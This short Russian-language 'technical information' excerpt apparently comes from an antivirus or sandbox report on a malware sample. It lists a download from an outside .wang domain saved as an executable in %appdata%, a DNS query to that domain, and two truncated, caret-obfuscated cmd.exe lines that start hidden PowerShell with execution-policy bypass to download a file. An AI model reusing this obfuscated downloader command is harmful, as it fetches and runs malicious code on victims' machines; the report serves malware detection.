Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OWe^Rs^H^ELl.Ex^e -^executI^O^nPOLICy b^yP^Ass -N^O^PrO^f^ile -^WiN^DO^w^STYl^E h^i^D^De^N (neW^-^ObjEc^t Sy^ST^EM^.Net.we^b^cl^I^E^nT^).Do^wn^l^oadfi^L^E('http://trans...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "p^OWe^Rs^H^ELl.Ex^e -^executI^O^nPOLICy b^yP^Ass -N^O^PrO^f^ile -^WiN^DO^w^STYl^E h^i^D^De^N (neW^-^ObjEc^t Sy^ST^EM^.Net.we^b^cl^I^E^nT^).Do^wn^l^oadfi^L^E('http://trans...' (со скрытым окном)